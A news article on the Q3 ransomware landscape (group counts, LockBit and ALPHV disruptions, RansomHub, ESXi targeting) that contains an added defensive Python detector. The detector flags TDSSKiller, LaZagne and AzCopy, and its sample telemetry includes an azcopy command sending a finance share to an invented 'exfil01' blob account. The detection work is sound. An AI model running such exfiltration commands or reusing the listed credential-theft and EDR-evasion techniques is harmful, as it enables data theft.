The current year has witnessed the highest count of operational ransomware factions on record. In the second quarter, 58 groups targeted global enterprises. Cyberint, a threat intelligence platform provider, reported a slight decrease in the third quarter, with 57 active groups.
Moreover, during Q3, only 58.3% of all detected attacks were attributed to the top 10 ransomware groups. This reflects both a rise in the overall number of active groups and reduced activity by the major players, following successful law enforcement actions against groups such as ALPHV and Dispossessor.
Adi Bleih, a security researcher at Cyberint, conveyed to TechRepublic via email: “With the all-time peak in the number of active ransomware groups, businesses now confront heightened threat levels, as each of these competing factions must vie for targets. The rivalry among different ransomware groups has fueled more frequent attacks, giving little room for error on the part of corporate cybersecurity teams.
“Previously unnoticed security vulnerabilities and gaps could swiftly lead to major security incidents now, given the proliferation of ransomware groups actively seeking their next victims across the internet.”
Impact of Law Enforcement Operations on Prominent Ransomware Groups
Separate research conducted by WithSecure revealed that out of the 67 tracked ransomware groups in 2023, 31 were defunct by Q2 2024. NCC Group also documented a year-on-year decline in ransomware attacks in June and July of this year, which experts attributed to the LockBit disruption.
Previously dominant in attacks, LockBit targeted almost 60% fewer companies with only 85 attacks in the third quarter compared to the second, as outlined in Cyberint’s report. This quarter marks the group’s lowest count of quarterly attacks in the past eighteen months.
An August analysis from Malwarebytes indicated that LockBit’s share of ransomware attacks decreased from 26% to 20% over the last year, despite a surge in individual attacks.
After a botched cyber attack on Change Healthcare in February, ALPHV, the second most active ransomware group, encountered a setback. The group failed to pay an affiliate their share of the $22 million ransom, leading the affiliate to expose them. ALPHV then staged a fake law enforcement takedown and shut down its operations.
These observations indicate that law enforcement measures are effective against established groups while paving the way for smaller factions. Malwarebytes analysts suggested that new groups “are undoubtedly competing to draw in affiliates and supersede the established forces in the ransomware arena.”
Cyberint analysts expressed optimism about the cascading effect of takedown operations on smaller entities, stating: “As these major operations falter, it is only a matter of time before other large and small ransomware groups take a similar route. The crackdown has constructed a more adversarial environment for these groups, hinting at a fleeting dominance for them.”
Rather than continuing the second quarter’s upward trend, when ransomware attacks rose by nearly 21.5%, the Cyberint researchers counted 1,209 cases in Q3, a 5.5% decrease.
Notably, the leading ransomware group of the quarter was RansomHub, responsible for 16.1% of all cases and targeting 195 new victims. Among its prominent attacks were those on global manufacturer Kawasaki and oil and gas services provider Halliburton. Cyberint analysts indicated that the group likely originated in Russia and maintained ties with former associates of the now-defunct ALPHV group.
Second on the list of active ransomware factions is Play, which affected 89 entities and accounted for 7.9% of all cases. Since June 2022, it has reportedly executed over 560 successful attacks, including a significant one this year that targeted a VMware ESXi environment.
“Unless obstructed, Play is set to surpass its record of yearly victims in 2024 (301),” the analysts predicted.
Focus on Linux and VMware ESXi Systems by Ransomware Groups
The Cyberint report highlighted a tendency where ransomware factions are particularly targeting Linux-based systems and VMware ESXi servers.
VMware ESXi serves as a bare-metal hypervisor facilitating the establishment and administration of virtual machines directly on server hardware, potentially including critical servers. Compromising the hypervisor could allow attackers to simultaneously incapacitate multiple virtual machines and eliminate recovery options like snapshots or backups, leading to severe disruptions for a business.
Ransomware groups Play and Cicada3301 have developed ransomware designed specifically for VMware ESXi servers, while Black Basta has exploited vulnerabilities that let it encrypt all the files belonging to the virtual machines.
VMs and other crucial business infrastructure are frequently hosted on Linux systems. This focus reflects attackers’ interest in the large payouts that follow from inflicting extensive damage on corporate networks.
Usage of Custom Malware and Exploitation of Authorized Tools by Attackers
Ransomware groups’ tactics have advanced significantly in the past year, with Cyberint researchers observing attackers using custom malware to evade security measures. One example is the Black Basta gang deploying several bespoke tools after infiltrating a target environment.
Additionally, attackers are leveraging legitimate security and cloud storage tools to avoid detection. RansomHub was observed using Kaspersky’s TDSSKiller rootkit remover to disable endpoint detection and response capabilities and the LaZagne password recovery tool to harvest credentials. Several groups have also used Microsoft’s Azure Storage Explorer and AzCopy tools to exfiltrate corporate data and store it in cloud infrastructure.
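The abuse of legitimate tools described above is something a security operations team can watch for directly in process-creation telemetry. The following is an added example, not code from Cyberint, TechRepublic or any of the vendors named; it keys on the tool names the report mentions (TDSSKiller, LaZagne, AzCopy, Azure Storage Explorer). The pipe-delimited event format, the severity labels and the Azure Blob URL pattern used to escalate an AzCopy finding are this example’s own assumptions, and the sample events are constructed.

```python
"""Flag execution of legitimate tools that ransomware crews have been reported
abusing: TDSSKiller (EDR tampering), LaZagne (credential harvesting) and
AzCopy / Azure Storage Explorer (exfiltration to cloud storage).

Events are assumed to arrive as 'timestamp|host|user|image|command_line'
records; that format is an assumption of this example, not a vendor schema.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Watchlist keyed by lowercase image basename. Labels and severities are this
# example's own choices, not taken from the report.
WATCHLIST = {
    "tdsskiller.exe": ("defense evasion: rootkit remover used to disable EDR", "high"),
    "lazagne.exe": ("credential access: local password recovery tool", "high"),
    "azcopy.exe": ("exfiltration: bulk copy to cloud storage", "medium"),
    "storageexplorer.exe": ("exfiltration: cloud storage client", "medium"),
}

# Assumed shape of an Azure Blob endpoint. An AzCopy job pointing at one is
# treated as more suspicious than a local-to-local copy and raised to high.
BLOB_URL = re.compile(r"https?://[\w.-]+\.blob\.core\.windows\.net", re.IGNORECASE)


@dataclass
class Finding:
    timestamp: str
    host: str
    user: str
    image: str
    technique: str
    severity: str


def parse_event(line: str) -> Optional[dict]:
    """Parse one pipe-delimited record; return None for malformed input."""
    parts = line.rstrip("\n").split("|", 4)
    if len(parts) != 5:
        return None  # skip bad records rather than abort the whole scan
    timestamp, host, user, image, cmdline = parts
    return {"timestamp": timestamp, "host": host, "user": user,
            "image": image, "cmdline": cmdline}


def image_basename(path: str) -> str:
    """Lowercase file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(event: dict) -> Optional[Finding]:
    """Return a Finding when the process image is on the watchlist."""
    name = image_basename(event["image"])
    if name not in WATCHLIST:
        return None
    technique, severity = WATCHLIST[name]
    if name == "azcopy.exe" and BLOB_URL.search(event["cmdline"]):
        severity = "high"  # copy job targets a cloud blob endpoint
    return Finding(event["timestamp"], event["host"], event["user"],
                   name, technique, severity)


def scan(lines):
    """Run every well-formed record through the watchlist; return findings."""
    findings = []
    for line in lines:
        event = parse_event(line)
        if event is None:
            continue
        finding = evaluate(event)
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample telemetry: hosts, users, paths and the storage account
# name are made up for this example.
SAMPLE_EVENTS = [
    "2024-09-12T08:01:10Z|WS-0142|corp\\jdoe|C:\\Windows\\explorer.exe|explorer.exe",
    "2024-09-12T08:14:22Z|WS-0142|corp\\jdoe|C:\\Users\\Public\\TDSSKiller.exe|TDSSKiller.exe",
    "2024-09-12T08:15:03Z|WS-0142|corp\\jdoe|C:\\Users\\Public\\laZagne.exe|laZagne.exe",
    "2024-09-12T09:40:51Z|SRV-FS01|corp\\svc_backup|C:\\Tools\\azcopy.exe|azcopy copy D:\\Shares\\Finance https://exfil01.blob.core.windows.net/dump --recursive",
    "2024-09-12T10:02:00Z|SRV-FS01|corp\\svc_backup|C:\\Tools\\azcopy.exe|azcopy copy D:\\Shares\\Finance E:\\Backup --recursive",
    "garbled line without enough fields",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.severity.upper():6} {f.timestamp} {f.host} {f.user} {f.image}: {f.technique}")
```

Matching on the image basename is deliberately simple and is trivially evaded by renaming the binary, so in production this check should be paired with file-hash or code-signer checks (for example, a Kaspersky- or Microsoft-signed binary launched from a user-writable directory) and with a baseline of where AzCopy is legitimately used, so that the backup job in the sample stays at medium while the copy to an unknown storage account is escalated.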
TechRepublic was informed by Bleih: “As these syndicates achieve greater success and resources, they enhance their sophistication and business practices to mirror legitimate enterprises. While common attack vectors such as phishing schemes, credential theft, and exploiting vulnerabilities in publicly-accessible assets are still prevalent, the innovation in how they execute these methods is growing.
“They are also gaining in agility and scalability. For example, even though threat actors have always possessed technical prowess, they are now capable of exploiting new vulnerabilities at a large scale merely days after a critical CVE is disclosed. Previously, this process could have taken weeks or even more.”
